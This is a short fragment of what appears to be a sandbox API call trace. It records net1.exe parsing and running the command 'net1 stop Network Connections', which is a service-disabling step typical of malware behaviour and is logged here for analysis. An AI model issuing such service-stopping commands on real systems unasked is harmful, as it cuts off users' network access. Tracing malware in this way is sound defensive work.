[0297.619] LocalFree (hMem=0x42f8928) returned 0x0 [0297.619] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఻") returned 0x18 [0297.619] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0297.619] LocalFree (hMem=0x42f8928) returned 0x0 [0297.619] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ా") returned 0x2a [0297.619] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0297.620] LocalFree (hMem=0x42fc230) returned 0x0 [0297.620] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ు") returned 0x15 [0297.620] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0297.620] GetFileType (hFile=0x40) returned 0x2 [0297.620] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x11f788 | out: lpMode=0x11f788) returned 1 [0297.621] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x42f8928*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x11f78c, lpReserved=0x0 | out: lpBuffer=0x42f8928*, lpNumberOfCharsWritten=0x11f78c*=0x15) returned 1 [0297.622] LocalFree (hMem=0x42f8928) returned 0x0 [0297.623] NetApiBufferFree (Buffer=0x42f8128) returned 0x0 [0297.623] NetApiBufferFree (Buffer=0x42f8140) returned 0x0 [0297.623] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Network Connections" [0297.623] exit (_Code=1) Thread: id = 227 os_tid = 0x11bc